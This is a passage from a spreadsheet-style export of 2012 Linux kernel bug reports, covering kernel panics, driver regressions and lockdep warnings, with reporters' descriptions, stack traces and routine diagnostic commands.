2.6.32-5-amd64 #1 [ 136.142339] Call Trace: [ 136.144925] &lt;IRQ&gt; [&lt;ffffffff812fade7&gt;] ? panic+0x86/0x143 [ 136.150823] [&lt;ffffffff81068740&gt;] ? up+0xe/0x37 [ 136.155536] [&lt;ffffffff8104e5af&gt;] ? release_console_sem+0x17e/0x1af [ 136.162093] [&lt;ffffffff812fdb25&gt;] ? oops_end+0xa7/0xb4 [ 136.167503] [&lt;ffffffff810323f0&gt;] ? no_context+0x1e9/0x1f8 [ 136.173206] [&lt;ffffffff810325a5&gt;] ? __bad_area_nosemaphore+0x1a6/0x1ca [ 136.179918] [&lt;ffffffffa054c4cf&gt;] ? crypto_cbc_decrypt+0x101/0x11f [cbc] [ 136.186895] [&lt;ffffffff812feeef&gt;] ? do_page_fault+0x69/0x2fc [ 136.192794] [&lt;ffffffff812fd005&gt;] ? page_fault+0x25/0x30 [ 136.198336] [&lt;ffffffffa048e0ef&gt;] ? xfrm4_mode_tunnel_input+0x0/0x189 [xfrm4_mode_tunnel] [ 136.206791] [&lt;ffffffff81196213&gt;] ? memmove+0xf/0x3c [ 136.212019] [&lt;ffffffffa048e254&gt;] ? xfrm4_mode_tunnel_input+0x165/0x189 [xfrm4_mode_tunnel] [ 136.220718] [&lt;ffffffff812b0ab6&gt;] ? xfrm_input+0x26f/0x386 [ 136.226414] [&lt;ffffffff8129340c&gt;] ? udp_queue_rcv_skb+0x56/0x201 [ 136.232620] [&lt;ffffffff81293993&gt;] ? __udp4_lib_rcv+0x3dc/0x5e7 [ 136.238645] [&lt;ffffffff81273896&gt;] ? ip_local_deliver_finish+0x0/0x1e9 [ 136.245322] [&lt;ffffffff812739dc&gt;] ? ip_local_deliver_finish+0x146/0x1e9 [ 136.252184] [&lt;ffffffff8127352b&gt;] ? ip_rcv_finish+0x373/0x38d [ 136.258157] [&lt;ffffffff812737e5&gt;] ? ip_rcv+0x2a0/0x2ed [ 136.263565] [&lt;ffffffff8124fb55&gt;] ? process_backlog+0x81/0xb4 [ 136.269523] [&lt;ffffffff8125013b&gt;] ? net_rx_action+0xae/0x1c9 [ 136.275384] [&lt;ffffffff81053dc7&gt;] ? __do_softirq+0xdd/0x1a6 [ 136.281236] [&lt;ffffffff81011cac&gt;] ? call_softirq+0x1c/0x30 [ 136.286951] [&lt;ffffffff8101322b&gt;] ? do_softirq+0x3f/0x7c [ 136.292446] [&lt;ffffffff81053c37&gt;] ? irq_exit+0x36/0x76 [ 136.297781] [&lt;ffffffff81012922&gt;] ? do_IRQ+0xa0/0xb6 [ 136.303009] [&lt;ffffffff810114d3&gt;] ? ret_from_intr+0x0/0x11 [ 136.308750] &lt;EOI&gt; [&lt;ffffffff810176a4&gt;] ? mwait_idle+0x72/0x7d [ 136.314939] [&lt;ffffffff81017654&gt;] ? mwait_idle+0x22/0x7d [ 136.320422] [&lt;ffffffff8100fe97&gt;] ? cpu_idle+0xa2/0xda [ 136.325807] [&lt;ffffffff8151c140&gt;] ? early_idt_handler+0x0/0x71 [ 136.331841] [&lt;ffffffff8151ccdd&gt;] ? start_kernel+0x3dc/0x3e8 [ 136.337763] [&lt;ffffffff8151c3b7&gt;] ? x86_64_start_kernel+0xf9/0x106</t>
  </si>
  <si>
    <t>kvm module has bogus kernel version check</t>
  </si>
  <si>
    <t>2012-02-22 22:53 UTC</t>
  </si>
  <si>
    <t>MCB</t>
  </si>
  <si>
    <t>In kvm-kmod-3.2, x86/external-module-compat.h, line 1102 the following check is present: #if LINUX_VERSION_CODE &lt; KERNEL_VERSION(2,6,37) || \ (LINUX_VERSION_CODE == KERNEL_VERSION(2,6,32) &amp;&amp; KERNEL_EXTRAVERSION &lt; 40) The second half is bogus, since if kernel version is 2.6.32, it would have matched the &lt; 2.6.37 anyway. Maybe the 2,6,32 should read 2,6,37 instead? (that would make more sense, but may not be right!) This check appears to be present since kvm-kmod release 3.0b, which makes it unlikely many people tried it with 2.6.27.40+ kernels and found it to be a problem... -- Maarten</t>
  </si>
  <si>
    <t>alpha: futex regression bisected</t>
  </si>
  <si>
    <t>3.3-rc6</t>
  </si>
  <si>
    <t>2012-02-26 09:31 UTC</t>
  </si>
  <si>
    <t>2012-03-12 15:49 UTC</t>
  </si>
  <si>
    <t>Subject : alpha: futex regression bisected Submitter : Michael Cree &lt;mcree@orcon.net.nz&gt; Date : 2012-02-20 8:20 Message-ID : 4F420256.2090600@orcon.net.nz References : http://marc.info/?l=linux-kernel&amp;m=132972606917069&amp;w=2 This entry is being used for tracking a regression from 3.2. Please don't close it until the problem is fixed in the mainline. Caused by: commit 8d7718aa082aaf30a0b4989e1f04858952f941bc Author: Michel Lespinasse &lt;walken@google.com&gt; Date: Thu Mar 10 18:50:58 2011 -0800 futex: Sanitize futex ops argument types First-Bad-Commit : 8d7718aa082aaf30a0b4989e1f04858952f941bc</t>
  </si>
  <si>
    <t>WARNING: at block/genhd.c:1465</t>
  </si>
  <si>
    <t>3.3-rc4</t>
  </si>
  <si>
    <t>2012-02-26 10:31 UTC</t>
  </si>
  <si>
    <t>2012-03-24 20:28 UTC</t>
  </si>
  <si>
    <t>Subject : WARNING: at block/genhd.c:1465 Submitter : Christian Kujau &lt;lists@nerdbynature.de&gt; Date : 2012-02-21 11:00 Message-ID : alpine.DEB.2.01.1202210246400.4930@trent.utfs.org References : http://marc.info/?l=linux-kernel&amp;m=132982259213941&amp;w=2 This entry is being used for tracking a regression from 3.2. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[3.1.8 -&gt; 3.2.4 regression] Mute on master channel disappeared on a  Thinkpad T500</t>
  </si>
  <si>
    <t>3.2.0-1-amd64</t>
  </si>
  <si>
    <t>2012-02-26 15:20 UTC</t>
  </si>
  <si>
    <t>S. G.</t>
  </si>
  <si>
    <t>2012-03-28 18:17 UTC</t>
  </si>
  <si>
    <t>Created attachment 72482 [details] alsainfo output running kernel 3.1.8 The mute function disappeared after upgrading from kernel version 3.1.8 to version 3.2.4.</t>
  </si>
  <si>
    <t>rt2800pci unstable - chokes after too much I/O</t>
  </si>
  <si>
    <t>&gt;=3.2</t>
  </si>
  <si>
    <t>2012-02-27 07:22 UTC</t>
  </si>
  <si>
    <t>Avant-texte</t>
  </si>
  <si>
    <t>2013-03-26 09:11 UTC</t>
  </si>
  <si>
    <t>I have observed this problem on a machine using Ralink's RT2800 802.11n PCI card. When too much data passed over the network, the interface chokes. "Too much data": I can maintain a mostly (possibly for a few hours) stable connection if I throttle the network traffic to between 7 and 10 kb/s up and down; however, prolonged traffic at higher rates will cause the interface to choke. The higher the rate, the quicker it happens. For example, rates up to and over 50 kb/s are possible but only for less than a minute. The exact amount of time seems to vary a bit. If the execessive network usage is brief enough, the interface seems to stay functional there after, but with a seemingly reduced threshhold. "Choke": Ifconfig and iwconfig will continue to report the interface as being associated to an AP and having an IP address, but any attempts to reach the wider Internet or LAN (even the local gateway) will result in a pause followed by an unknown host error for any application that tries. Ifconfig and iwconfig's output remains constant, as if there's no problem, throught this whole process. The reason I think this a bug in the kernel and/or driver: I found I can restart the interface's usefulness after choking, by reloading the driver module. However, it must be unloaded and reloaded twice. Once is not enough. These strange symtoms will continue --for as long as I try-- until I perform a second unload/reload cycle. That is to say I must: ---[code]--- | # modprobe -r rt2800pci | # modprobe rt2800pci | # modprobe -r rt2800pci | # modprobe rt2800pci | # dhcpcd wlan0 ---[/code]--- before my connection will work again. I can do this an unlimited number of times to keep my connection running, but I do notice it sometimes breaks faster after several unload/reload cycles that happened close together. Additionaly, I spot these errors via dmesg: | phy0 -&gt; rt2800pci_mcu_status: Error - MCU request failed, no response from hardware | rt2800pci 0000:05:00.0: PCI INT A disabled | rt2800pci 0000:05:00.0: PCI INT A -&gt; GSI 19 (level, low) -&gt; IRQ 19 | Registered led device: rt2800pci-phy0::radio | Registered led device: rt2800pci-phy0::assoc | Registered led device: rt2800pci-phy0::quality</t>
  </si>
  <si>
    <t>2013-02-08 18:24 UTC</t>
  </si>
  <si>
    <t>Dual channel LVDS is not configured correctly</t>
  </si>
  <si>
    <t>3.3-rc5</t>
  </si>
  <si>
    <t>2012-03-01 11:45 UTC</t>
  </si>
  <si>
    <t>2012-07-01 10:32 UTC</t>
  </si>
  <si>
    <t>I have a macbookpro 8,2. When using the EFI boot the discrete graphics is disabled (no bios). The integrated graphics (pci id 8086:0126) is enabled and somewhat works but the screen is messed up as two LVDS channels are required to send data to the high res display, but the i915 driver does not seem to be configured to figure this out for this configuration. See the below link for an explanation and a workaround patch that applied on an earlier kernel version (3.1 I believe). I have tested this and the bug is present on 3.3-rc5. http://permalink.gmane.org/gmane.comp.freedesktop.xorg.drivers.intel/3826</t>
  </si>
  <si>
    <t>linux 3.3-rc5 fails to build</t>
  </si>
  <si>
    <t>2012-03-03 08:40 UTC</t>
  </si>
  <si>
    <t>2012-03-03 09:57 UTC</t>
  </si>
  <si>
    <t>Subject : linux 3.3-rc5 fails to build Submitter : "Tomas M." &lt;tmezzadra@gmail.com&gt; Date : 2012-02-26 12:22 Message-ID : 4F4A23EC.2040802@gmail.com References : http://marc.info/?l=linux-kernel&amp;m=133025896510319&amp;w=2 This entry is being used for tracking a regression from 3.2. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Elmar Stellnberger</t>
  </si>
  <si>
    <t>kernel BUG at fs/ext4/extents.c:1953</t>
  </si>
  <si>
    <t>3.2.1, 3.2.9</t>
  </si>
  <si>
    <t>2012-03-04 14:39 UTC</t>
  </si>
  <si>
    <t>merll</t>
  </si>
  <si>
    <t>Messages "kernel BUG at fs/ext4/extents.c:1953" occur, which seem to be triggered when running certain processes (reproducible with init and gdm). The volume can be mounted without any apparent problems and e2fsck does not report any errors. Nevertheless, the file system may have been corrupted during an earlier system crash. For example, the following message can be produced when running "shutdown -r now": ------------[ cut here ]------------ kernel BUG at fs/ext4/extents.c:1953! invalid opcode: 0000 [#1] SMP CPU 0 Modules linked in: vfat fat firewire_sbp2 uvcvideo videodev firewire_ohci snd_usb_audio firewire_core btusb v4l2_compat_ioctl32 crc_itu_t snd_usbmidi_lib bluetooth snd_rawmidi Pid: 1, comm: init Not tainted 3.2.9-gentoo #4 Gigabyte Technology Co., Ltd. EX38-DS4/EX38-DS4 RIP: 0010:[&lt;ffffffff81194746&gt;] [&lt;ffffffff81194746&gt;] ext4_ext_put_in_cache+0x76/0x80 RSP: 0018:ffff88011aa4d7a8 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff88011acc5350 RCX: 0000000000508274 RDX: 0000000000000000 RSI: 0000000000000000 RDI: ffff88011acc5350 RBP: 0000000000000000 R08: ffff880119427ae0 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000508274 R12: 0000000000000000 R13: ffff880119b81800 R14: 0000000000508274 R15: 0000000000000000 FS: 00007f8703c7d700(0000) GS:ffff88011fc00000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007fff54d5fff8 CR3: 000000011ab1a000 CR4: 00000000000006f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 Process init (pid: 1, threadinfo ffff88011aa4c000, task ffff88011aa58000) Stack: ffff880119427ae0 ffff88011aa4d998 ffff88011acc5350 ffff880119b81800 ffff88011acc52cc ffffffff8119780f 0000000100014341 ffff88011fffbe00 ffff88011fffbe00 ffffffff810e720d 0000000000000000 0000000000508274 Call Trace: [&lt;ffffffff8119780f&gt;] ? ext4_ext_map_blocks+0x15f/0x1b00 [&lt;ffffffff810e720d&gt;] ? zone_statistics+0x9d/0xa0 [&lt;ffffffff810d78f9&gt;] ? get_page_from_freelist+0x309/0x720 [&lt;ffffffff8144ab9e&gt;] ? __schedule+0x29e/0x740 [&lt;ffffffff8117ec61&gt;] ? ext4_da_get_block_prep+0x141/0x2c0 [&lt;ffffffff8113eb31&gt;] ? alloc_page_buffers+0x71/0xe0 [&lt;ffffffff81141316&gt;] ? __block_write_begin+0x206/0x560 [&lt;ffffffff8117eb20&gt;] ? ext4_bmap+0x110/0x110 [&lt;ffffffff81180d47&gt;] ? ext4_da_write_begin+0xc7/0x1c0 [&lt;ffffffff81061183&gt;] ? __wake_up+0x43/0x70 [&lt;ffffffff810d0860&gt;] ? generic_file_buffered_write+0x120/0x2c0 [&lt;ffffffff810d2469&gt;] ? __generic_file_aio_write+0x219/0x410 [&lt;ffffffff810d8453&gt;] ? __alloc_pages_nodemask+0x123/0x810 [&lt;ffffffff810d26d9&gt;] ? generic_file_aio_write+0x79/0x100 [&lt;ffffffff8117b20e&gt;] ? ext4_file_write+0x6e/0x290 [&lt;ffffffff8110454e&gt;] ? alloc_pages_vma+0x5e/0x220 [&lt;ffffffff81114ddf&gt;] ? do_sync_write+0xbf/0x100 [&lt;ffffffff8115797f&gt;] ? fcntl_setlk+0x5f/0x330 [&lt;ffffffff81115646&gt;] ? vfs_write+0xc6/0x170 [&lt;ffffffff8111592e&gt;] ? sys_write+0x4e/0x90 [&lt;ffffffff8144d8bb&gt;] ? system_call_fastpath+0x16/0x1b Code: 00 4d 89 b5 98 02 00 00 fe 83 7c 02 00 00 48 8b 1c 24 48 8b 6c 24 08 4c 8b 64 24 10 4c 8b 6c 24 18 4c 8b 74 24 20 48 83 c4 28 c3 &lt;0f&gt; 0b 0f 1f 84 00 00 00 00 00 41 57 41 56 41 55 41 54 49 89 cc RIP [&lt;ffffffff81194746&gt;] ext4_ext_put_in_cache+0x76/0x80 RSP &lt;ffff88011aa4d7a8&gt; ---[ end trace 050481fbd074e5e1 ]---</t>
  </si>
  <si>
    <t>Samsung laptop can only change brightness when adding acpi_backlight=vendor</t>
  </si>
  <si>
    <t>2012-03-04 17:24 UTC</t>
  </si>
  <si>
    <t>Luis Medinas</t>
  </si>
  <si>
    <t>2013-05-06 01:00 UTC</t>
  </si>
  <si>
    <t>If i set this line on the bootloader i'm able to change the brightness using the FN keys. if this line isn't set i can only change brightness (using the FN keys) from 100% to 90%. I'm using the intel driver. dmidecode attached. What should i provide more to fix this bug ? I can also cook a patch if anyone help me to get started. Thanks</t>
  </si>
  <si>
    <t>Network Interface:  "dummy" vs. "dummy0" - Documentation issue?</t>
  </si>
  <si>
    <t>3.4-rc7</t>
  </si>
  <si>
    <t>2012-03-05 03:38 UTC</t>
  </si>
  <si>
    <t>2012-07-01 09:38 UTC</t>
  </si>
  <si>
    <t>[BISECTED]acpi_processor fails to recognize C4 after NOTIFY_POWER - Thinkpad T43</t>
  </si>
  <si>
    <t>2012-03-05 14:36 UTC</t>
  </si>
  <si>
    <t>Andreas Müller</t>
  </si>
  <si>
    <t>2013-02-06 20:23 UTC</t>
  </si>
  <si>
    <t>Created attachment 72542 [details] dmesg with attached /proc/cpuinfo I observed that acpi_idle won't utilize the C4-state after unplugging the laptop from power. However, after sending it into standby, it will be able to use it properly. Maybe the state-data is not properly initialized by the processor, as it doesn't seem to fiddle with (only reads) the data after the notification ACPI_PROCESSOR_NOTIFY_POWER has been received. (But I have not expertise here, I have no idea where to look further.) Still, linux recognizes that there is another state, but cannot make use of it. Some information from /sys/devices/system/cpu/cpu0/cpuidle/state4/*: Before unplugging, there is no "state4". after unplugging: desc: &lt;null&gt; latency: 185 name: &lt;null&gt; power: 0 after standby while unplugged (or booted up while unplugged): desc: ACPI IOPORT 0x1016 latency: 185 name: C4 power: 0 I am using a IBM Thinkpad T43 (2669Y3N) with a Pentium-M (Donthan 740) running a vanilla kernel 3.2.9, I attached /proc/cpuinfo and a dmesg. Please let me know what else information I could supply or try out.</t>
  </si>
  <si>
    <t>shutdown does not work</t>
  </si>
  <si>
    <t>3.3.0-030300rc6</t>
  </si>
  <si>
    <t>2012-03-06 23:11 UTC</t>
  </si>
  <si>
    <t>Malte</t>
  </si>
  <si>
    <t>2012-05-12 02:07 UTC</t>
  </si>
  <si>
    <t>I'am testing Ubuntu 12.04 Beta 1 (3.2.0-18-generic and Mainlinekernel 3.3-rc6) and shutdown does not work. If i tray to shutdown or restart ther is the Ubuntu-Logo with the wording and the whites and the Orange points but it freezes. If it is frozen ctrl+alt+del or ctrl+alt+F1 show no effect. The hard drive turns off but the CPU and the display will continue. I have tried the following terminal commands, but the result is always the same. sudo shutdown -h now sudo shutdown -P now sudo halt sudo poweroff sudo reboot The problem occurs on a Acer TravelMate 8473T (use UEFI, not BIOS) This is my first Report on bugzilla.kernel.org and i am sorry that I can give no further information. This system forgets that there was a problem, because the hard drive turns off. This problem does not occur under Ubuntu 11.10 (3.0.0-generic).</t>
  </si>
  <si>
    <t>Unable to use suspension and hibernation on ASUS N53JQ-SZ197X</t>
  </si>
  <si>
    <t>2012-03-07 13:30 UTC</t>
  </si>
  <si>
    <t>Luigi Caiffa</t>
  </si>
  <si>
    <t>Created attachment 72550 [details] System information and various logs Hi, I've got an Asus N53J and suspension and hibernation don't work. The system freezes before shutting down, and the only solution is to power off it in hardware. On reboot, I'm able to resume my session if I used hibernation, but obviously a new one starts if I shut down after using suspension. Systems logs are in attachment. Let me know if you need more informations.</t>
  </si>
  <si>
    <t>Garbled display on external screen when using 1920x1080 instead of 1920x1200</t>
  </si>
  <si>
    <t>2012-03-07 22:53 UTC</t>
  </si>
  <si>
    <t>thejoe</t>
  </si>
  <si>
    <t>also reported here: https://bugs.freedesktop.org/show_bug.cgi?id=44755 and here: https://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-ati/+bug/915408 [Problem] i have an external monitor (1920x1200 resolution) that, when set to 1920x1080 resolution (native resolution of laptop display), garbles the screen as seen in the screenshot below. The problem doesn't happen using the catalyst driver. https://bugs.launchpad.net/lightdm-gtk-greeter/+bug/813566/+attachment/2221015/+files/2011-07-20_07-51-28_83.jpg ProblemType: BugDistroRelease: Ubuntu 11.10 Package: xorg 1:7.6+7ubuntu7 ProcVersionSignature: Ubuntu 3.0.0-15.25-generic 3.0.13 Uname: Linux 3.0.0-15-generic x86_64 .tmp.unity.support.test.0: ApportVersion: 1.23-0ubuntu4 Architecture: amd64 CompizPlugins: [core,bailer,detection,composite,opengl,decor,mousepoll,vpswitch,regex,animation,snap,expo,move,compiztoolbox,place,grid,imgpng,gnomecompat,wall,ezoom,workarounds,staticswitcher,resize,fade,unitymtgrabhandles,scale,session,unityshell] CompositorRunning: None Date: Thu Jan 12 07:42:25 2012 DistUpgraded: Log time: 2011-07-13 10:07:59.371965 DistroCodename: oneiric DistroVariant: ubuntu ExtraDebuggingInterest: Yes, whatever it takes to get this fixed in Ubuntu GraphicsCard: ATI Technologies Inc Broadway PRO [Mobility Radeon HD 5800 Series] [1002:68a1] (prog-if 00 [VGA controller]) Subsystem: Hewlett-Packard Company Device [103c:1522]InstallationMedia: Ubuntu 10.04 "Lucid Lynx" - Release Candidate amd64 (20100419.1) MachineType: Hewlett-Packard HP ENVY 15 Notebook PC ProcEnviron: PATH=(custom, user) LANG=en_US.UTF-8ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-3.0.0-15-generic root=UUID=639dc488-e095-42a4-8c1f-ffb1a9299e1c ro crashkernel=384M-2G:64M,2G-:128M quiet splash vt.handoff=7SourcePackage: xorg UpgradeStatus: Upgraded to oneiric on 2011-07-13 (182 days ago) dmi.bios.date: 04/23/2010 dmi.bios.vendor: Hewlett-Packard dmi.bios.version: F.26 dmi.board.asset.tag: Base Board Asset Tag dmi.board.name: 1522 dmi.board.vendor: Hewlett-Packard dmi.board.version: 36.34 dmi.chassis.type: 10 dmi.chassis.vendor: Hewlett-Packard dmi.chassis.version: N/A dmi.modalias: dmi:bvnHewlett-Packard:bvrF.26:bd04/23/2010:svnHewlett-Packard:pnHPENVY15NotebookPC:pvr048F110000241920001530000:rvnHewlett-Packard:rn1522:rvr36.34:cvnHewlett-Packard:ct10:cvrN/A: dmi.product.name: HP ENVY 15 Notebook PC dmi.product.version: 048F110000241920001530000 dmi.sys.vendor: Hewlett-Packard version.compiz: compiz 1:0.9.6+bzr20110929-0ubuntu6 version.ia32-libs: ia32-libs 20090808ubuntu26 version.libdrm2: libdrm2 2.4.26-1ubuntu1 version.libgl1-mesa-dri: libgl1-mesa-dri 7.11-0ubuntu3 version.libgl1-mesa-dri-experimental: libgl1-mesa-dri-experimental N/A version.libgl1-mesa-glx: libgl1-mesa-glx 7.11-0ubuntu3 version.xserver-xorg: xserver-xorg 1:7.6+7ubuntu7 version.xserver-xorg-input-evdev: xserver-xorg-input-evdev 1:2.6.0-1ubuntu13 version.xserver-xorg-video-ati: xserver-xorg-video-ati 1:6.14.99~git20110811.g93fc084-0ubuntu1 version.xserver-xorg-video-intel: xserver-xorg-video-intel 2:2.15.901-1ubuntu2.1 version.xserver-xorg-video-nouveau: xserver-xorg-video-nouveau 1:0.0.16+git20110411+8378443-1 [reply] [-] Comment 1 discussion from freedesktop.org bug: Alex Deucher 2012-01-13 08:25:54 UTC The problem is the modeline from your monitor for the 1920x1080 mode is greater than 165 Mhz which is the current cut off for single link mode in the driver: (II) RADEON(0): Modeline "1920x1080"x60.0 172.78 1920 2040 2248 2576 1080 1081 1084 1118 -hsync +vsync (67.1 kHz) It should work if you specify a modeline with a lower clock E.g., Modeline "1920x1080R" 138.50 1920 1968 2000 2080 1080 1083 1088 1111 +hsync -vsync [reply] [-] Comment 5 Alex Deucher 2012-01-13 08:34:21 UTC Created attachment 55557 [details] [review] possible fix This patch against drm-next or Linus git should fix the issue. [reply] [-] Comment 6 thejoe@gmail.com 2012-01-13 08:53:54 UTC confirmed that the following sequence displays a non-garbled 1920x1080 display on the external monitor: # xrandr --newmode "1920x1080R" 138.50 1920 1968 2000 2080 1080 1083 1088 1111 +hsync -vsync # xrandr --addmode HDMI-0 1920x1080R # xrandr 1920x1080R [reply] [-] Comment 7 Florian Mickler 2012-02-01 13:09:58 UTC A patch referencing this bug report has been merged in Linux v3.3-rc2: commit 9aa59993e226af94088adaee993eb8cfd33ae295 Author: Alex Deucher &lt;alexander.deucher@amd.com&gt; Date: Fri Jan 20 15:03:30 2012 -0500 drm/radeon/kms: refine TMDS dual link checks [reply] [-] Comment 8 thejoe@gmail.com 2012-03-07 14:45:11 UTC I've tested against a kernel with this patch, as well as mainline kernel (both built by ubuntu kernel team), and am still seeing the same behavior. So seems like this change doesn't fix the issue.</t>
  </si>
  <si>
    <t>iwlwifi: Microcode SW error detected</t>
  </si>
  <si>
    <t>2012-03-08 16:35 UTC</t>
  </si>
  <si>
    <t>Munzir Taha</t>
  </si>
  <si>
    <t>2015-11-22 07:30 UTC</t>
  </si>
  <si>
    <t>The wifi card is almost unusable. Frequently disconnect unless I used the workaround "options iwlwifi 11n_disable=1" I filed a bug to my distribution at https://bugs.launchpad.net/ubuntu/+source/linux/+bug/944271 and was redirected upstream. $ sh ver_linux If some fields are empty or look unusual you may have an old version. Compare to the current minimal requirements in Documentation/Changes. Linux GT683R 3.3.0-030300rc6-generic #201203032235 SMP Sun Mar 4 03:36:15 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux Gnu C 4.6 Gnu make 3.81 binutils 2.22 util-linux 2.20.1 mount support module-init-tools 3.16 e2fsprogs 1.42 pcmciautils 018 PPP 2.4.5 Linux C Library 2.15 Dynamic linker (ldd) 2.15 Procps 3.2.8 Net-tools 1.60 Kbd 1.15.2 Sh-utils 8.13 wireless-tools 30 Modules Loaded btusb webcamstudio ip6table_filter ip6_tables ebtable_nat ebtables ipt_MASQUERADE iptable_nat nf_nat nf_conntrack_ipv4 nf_defrag_ipv4 xt_state nf_conntrack ipt_REJECT xt_CHECKSUM iptable_mangle xt_tcpudp iptable_filter ip_tables x_tables bridge stp kvm_intel kvm dm_crypt parport_pc ppdev rfcomm bnep bluetooth snd_hda_codec_hdmi snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep arc4 snd_pcm snd_seq_midi snd_rawmidi snd_seq_midi_event uvcvideo videobuf2_core videodev snd_seq v4l2_compat_ioctl32 videobuf2_vmalloc videobuf2_memops rts5139 iwlwifi snd_timer snd_seq_device dm_multipath mac80211 snd mxm_wmi cfg80211 soundcore snd_page_alloc mac_hid psmouse serio_raw mei wmi lp parport r8169 usbhid hid video Attached is dmesg and lspci -vvnn</t>
  </si>
  <si>
    <t>Wireless with BCM4306 and b43 driver broken with kernel 3.2.9</t>
  </si>
  <si>
    <t>3.2.9</t>
  </si>
  <si>
    <t>2012-03-09 17:01 UTC</t>
  </si>
  <si>
    <t>Phillip Wood</t>
  </si>
  <si>
    <t>2012-03-16 13:27 UTC</t>
  </si>
  <si>
    <t>Upon upgrading from 3.2.8 to 3.2.9 wireless networking with BCM4306 &amp; b43 driver stops working, wlan0 never becomes available. I have attached the relevant portion of my kernel logs. lspci -v gives (on 3.2.8) 06:00.0 Network controller: Broadcom Corporation BCM4306 802.11b/g Wireless LAN Controller (rev 03) Subsystem: Belkin F5D7011 v1000 High-Speed Mode Wireless G Notebook Card Flags: bus master, fast devsel, latency 64, IRQ 11 Memory at 38000000 (32-bit, non-prefetchable) [size=8K] Kernel driver in use: b43-pci-bridge I'm using the standard kernel on Arch Linux, their kernel config is unchanged between the 3.2.8 and 3.2.9 packages.</t>
  </si>
  <si>
    <t>[SNB] 3.3.0-rc5+git: WARNING: at drivers/gpu/drm/i915/i915_irq.c:652 ironlake_irq_handler+0x4ea/0x500()</t>
  </si>
  <si>
    <t>3.3.0-rc5+git</t>
  </si>
  <si>
    <t>2012-03-11 19:35 UTC</t>
  </si>
  <si>
    <t>Subject : 3.3.0-rc5+git: WARNING: at drivers/gpu/drm/i915/i915_irq.c:652 ironlake_irq_handler+0x4ea/0x500() Submitter : Soeren Sonnenburg &lt;sonne@debian.org&gt; Date : 2012-03-05 23:59 Message-ID : 1330991976.9223.16.camel@no References : http://marc.info/?l=linux-kernel&amp;m=133099242810332&amp;w=2 This entry is being used for tracking a regression from 3.2. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>fcoe: Enabling VN2VN mode triggers a circular locking complaint</t>
  </si>
  <si>
    <t>3.3.0-rc7</t>
  </si>
  <si>
    <t>2012-03-13 12:16 UTC</t>
  </si>
  <si>
    <t>2012-07-01 09:48 UTC</t>
  </si>
  <si>
    <t>Kernel version: 3.3.0-rc7 How to reproduce: # modprobe fcoe # echo eth0 &gt;/sys/module/libfcoe/parameters/create_vn2vn Result: # dmesg device eth0 entered promiscuous mode scsi3 : FCoE Driver host3: libfc: Link up on port (000000) ====================================================== [ INFO: possible circular locking dependency detected ] 3.3.0-rc7-scst-debug+ #1 Not tainted ------------------------------------------------------- kworker/2:0/14 is trying to acquire lock: (rtnl_mutex){+.+.+.}, at: [&lt;c13a10c4&gt;] rtnl_lock+0x14/0x20 but task is already holding lock: (&amp;fip-&gt;ctlr_mutex){+.+...}, at: [&lt;f89713e7&gt;] fcoe_ctlr_timer_work+0x3e7/0xb60 [libfcoe] which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -&gt; #1 (&amp;fip-&gt;ctlr_mutex){+.+...}: [&lt;c1091f70&gt;] lock_acquire+0x80/0x1b0 [&lt;c147655d&gt;] mutex_lock_nested+0x6d/0x340 [&lt;f8970c32&gt;] fcoe_ctlr_link_up+0x22/0x180 [libfcoe] [&lt;f894620e&gt;] fcoe_create+0x47e/0x6e0 [fcoe] [&lt;f8973dd3&gt;] fcoe_transport_create+0x143/0x250 [libfcoe] [&lt;c10527e0&gt;] param_attr_store+0x30/0x60 [&lt;c1052696&gt;] module_attr_store+0x26/0x40 [&lt;c11a201e&gt;] sysfs_write_file+0xae/0x100 [&lt;c11449df&gt;] vfs_write+0x8f/0x160 [&lt;c1144cbd&gt;] sys_write+0x3d/0x70 [&lt;c147a0c4&gt;] syscall_call+0x7/0xb -&gt; #0 (rtnl_mutex){+.+.+.}: [&lt;c109164b&gt;] __lock_acquire+0x140b/0x1720 [&lt;c1091f70&gt;] lock_acquire+0x80/0x1b0 [&lt;c147655d&gt;] mutex_lock_nested+0x6d/0x340 [&lt;c13a10c4&gt;] rtnl_lock+0x14/0x20 [&lt;f89445ac&gt;] fcoe_update_src_mac+0x2c/0xb0 [fcoe] [&lt;f8971712&gt;] fcoe_ctlr_timer_work+0x712/0xb60 [libfcoe] [&lt;c104fb69&gt;] process_one_work+0x179/0x5d0 [&lt;c10502f1&gt;] worker_thread+0x121/0x2d0 [&lt;c10550ed&gt;] kthread+0x7d/0x90 [&lt;c1481a82&gt;] kernel_thread_helper+0x6/0x10 other info that might help us debug this: Possible unsafe locking scenario: CPU0 CPU1 ---- ---- lock(&amp;fip-&gt;ctlr_mutex); lock(rtnl_mutex); lock(&amp;fip-&gt;ctlr_mutex); lock(rtnl_mutex); *** DEADLOCK *** 3 locks held by kworker/2:0/14: #0: (events){.+.+.+}, at: [&lt;c104faf5&gt;] process_one_work+0x105/0x5d0 #1: ((&amp;fip-&gt;timer_work)){+.+...}, at: [&lt;c104faf5&gt;] process_one_work+0x105/0x5d0 #2: (&amp;fip-&gt;ctlr_mutex){+.+...}, at: [&lt;f89713e7&gt;] fcoe_ctlr_timer_work+0x3e7/0xb60 [libfcoe] stack backtrace: Pid: 14, comm: kworker/2:0 Not tainted 3.3.0-rc7 #1 Call Trace: [&lt;c14714a6&gt;] ? printk+0x1d/0x1f [&lt;c1471d4f&gt;] print_circular_bug+0x1b4/0x1be [&lt;c109164b&gt;] __lock_acquire+0x140b/0x1720 [&lt;c1091f70&gt;] lock_acquire+0x80/0x1b0 [&lt;c13a10c4&gt;] ? rtnl_lock+0x14/0x20 [&lt;c147655d&gt;] mutex_lock_nested+0x6d/0x340 [&lt;c13a10c4&gt;] ? rtnl_lock+0x14/0x20 [&lt;c13a10c4&gt;] ? rtnl_lock+0x14/0x20 